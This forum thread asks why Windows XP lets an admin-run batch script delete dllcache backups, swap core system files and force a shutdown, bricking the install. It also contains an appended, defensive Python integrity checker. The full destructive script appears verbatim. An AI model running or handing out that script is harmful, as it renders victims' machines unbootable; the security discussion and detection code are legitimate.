XP security

I was amazed when I tried running this script in a VM as an admin (as many people do) and found that it did indeed manage to brick the install. Surely a script kiddie would be foiled by rudimentary OS security?

Code:
@echo off
DEL "C:\WINDOWS\system32\dllcache\winlogon.exe"
DEL "C:\WINDOWS\system32\dllcache\explorer.exe"
DEL "C:\WINDOWS\system32\dllcache\services.exe"
DEL "C:\WINDOWS\system32\dllcache\vga.sys"
DEL "C:\WINDOWS\system32\dllcache\mup.sys"
DEL "C:\WINDOWS\system32\dllcache\taskmgr.exe"
DEL "C:\WINDOWS\system32\taskmgr.exe"
copy "taskmgr.exe" "C:\WINDOWS\system32"
RENAME "C:\WINDOWS\system32\services.exe" "explorer1.exe
RENAME "C:\WINDOWS\system32\winlogon.exe" "services.exe"
RENAME "C:\WINDOWS\system32\explorer1.exe" "winlogon.exe"
RENAME "C:\WINDOWS\explorer.exe" "explorer1.exe"
RENAME "C:\WINDOWS\winhelp.exe" "explorer.exe"
RENAME "C:\WINDOWS\explorer1.exe" "winhelp.exe"
RENAME "C:\WINDOWS\system32\drivers\mup.sys" "mup2.sys
RENAME "C:\WINDOWS\system32\drivers\vga.sys" "mup.sys"
RENAME "C:\WINDOWS\system32\drivers\mup2.sys" "vga.sys"
shutdown -s -t 10
tskill explorer
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA 
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA 
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA

I was under the impression that all of these would surely either have sharing violations on them or complete file permissions failures.

Can someone explain to me how this manages to work and why people on XP still insist on running XP as admin?
 
I'm actually surprised that worked inside of Windows.

That seems crazy when you think about it.

Have you tried just running parts of it at a time? I'm just surprised it let you rename explorer.exe.

Indeed. I was just as amazed. I ran the top bit before the shutdown command. No errors bar the copying of Task Manager.
 
Which begs the question, why let even admins delete backup dlls/files without any kind of prompt/warning/prevention?

Yes, admins should have mighty powers to do with as they wish, but one would hope the OS isn't that trusting. I am quite confident my doctor knows what she is doing; that doesn't mean I'd be OK with her hacking off a limb! :p

In all fairness, I like proper God mode, it can be very useful to just be able to do what you know is correct. However, this power should not be bestowed on a user lightly.
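As an added example (not posted by anyone in this thread), here is the kind of file-integrity check that would catch what the script above does: hash the protected files against a known-good baseline and confirm the dllcache backup copy is still present, so a deleted backup or a rename swap shows up instead of being discovered at the next reboot. It assumes only the six file names taken from the script, and instead of touching a real system32 it builds throwaway stand-in directories filled with constructed dummy contents.

```python
import hashlib
import os
import tempfile

# Files the thread's batch script deletes, renames or swaps: live copy in system32
# (or WINDOWS), Windows File Protection backup copy in dllcache.
PROTECTED = ["winlogon.exe", "explorer.exe", "services.exe",
             "taskmgr.exe", "vga.sys", "mup.sys"]

def sha256_of(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()

def check_protected(live_dir, cache_dir, baseline):
    """Verdict per protected file: 'missing', 'modified' (hash differs from the
    known-good baseline, which is how a rename swap shows up), 'backup-missing'
    (dllcache copy gone, so WFP has nothing to restore from) or 'ok'."""
    results = {}
    for name in PROTECTED:
        live = os.path.join(live_dir, name)
        if not os.path.exists(live):
            results[name] = "missing"
        elif sha256_of(live) != baseline[name]:
            results[name] = "modified"
        elif not os.path.exists(os.path.join(cache_dir, name)):
            results[name] = "backup-missing"
        else:
            results[name] = "ok"
    return results

def demo():
    """Constructed stand-in for system32 and dllcache: take a baseline, replay the
    script's effect (cache copies deleted, winlogon/services and vga/mup swapped,
    taskmgr gone because the copy failed) and return the verdicts."""
    with tempfile.TemporaryDirectory() as root:
        live, cache = os.path.join(root, "system32"), os.path.join(root, "dllcache")
        for d in (live, cache):
            os.mkdir(d)
            for n in PROTECTED:  # distinct dummy bytes per file, not real binaries
                with open(os.path.join(d, n), "wb") as f:
                    f.write(("fake contents of " + n).encode())
        baseline = {n: sha256_of(os.path.join(live, n)) for n in PROTECTED}
        for n in PROTECTED:  # DEL "C:\WINDOWS\system32\dllcache\..."
            os.remove(os.path.join(cache, n))
        os.remove(os.path.join(live, "taskmgr.exe"))  # copy of taskmgr.exe failed
        for a, b in (("services.exe", "winlogon.exe"), ("vga.sys", "mup.sys")):
            pa, pb, tmp = (os.path.join(live, x) for x in (a, b, "swap.tmp"))
            for src, dst in ((pa, tmp), (pb, pa), (tmp, pb)):  # RENAME chain
                os.rename(src, dst)
        return check_protected(live, cache, baseline)
```

On a real machine the baseline would be recorded once on a clean install and kept off the box, and the check scheduled to run as a low-privilege task.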
 